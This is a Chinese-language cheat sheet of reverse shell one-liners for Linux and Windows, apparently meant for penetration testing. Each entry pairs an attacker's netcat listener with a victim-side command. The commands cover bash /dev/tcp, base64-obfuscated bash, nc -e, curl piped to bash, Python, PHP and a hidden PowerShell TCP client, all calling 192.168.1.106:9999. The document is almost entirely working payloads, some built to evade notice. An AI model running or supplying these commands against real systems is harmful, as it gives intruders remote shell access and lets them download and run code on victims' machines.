常见反弹shell

linux反弹shell

---

payload生成器：https://www.revshells.com/

bash反弹

# 攻击机
nc -lvnp 9999

# 受害机
bash -i >& /dev/tcp/192.168.1.106/9999 0>&1

# 其他利用方式
# 命令执行
bash -c 'bash -i >& /dev/tcp/192.168.1.106/9999 0>&1'

# base64加密
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTA2Lzk5OTkgMD4mMQ==" | base64 -d | bash

bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTA2Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}'

nc反弹

# 攻击机
nc -lvnp 9999

# 受害机
nc 192.168.1.106 9999 -e bash

-e：创建连接后执行的程序

curl反弹

# 攻击机，开启apache服务
echo "bash -c 'bash -i >& /dev/tcp/192.168.1.106/9999 0>&1'" > shell.html
nc -lvnp 9999

# 受害机
curl 192.168.1.106/shell.html|bash

python反弹

# 攻击机
nc -lvnp 9999

# 受害机
# python2
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.106",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'

# python3
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.106",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'

php反弹

# 攻击机
nc -lvnp 9999

# 受害机
php -r '$sock=fsockopen("192.168.1.106",9999);`bash <&3 >&3 2>&3`;'

---

windows反弹shell

---

powershell反弹

# 攻击机
nc -lvnp 9999

# 受害机
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.1.106",9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

nc反弹

# 攻击机
nc -lvnp 9999

# 受害机
nc 192.168.1.106 9999 -e c:\windows\system32\cmd.exe

部分内容参考：https://www.freebuf.com/articles/web/247967.html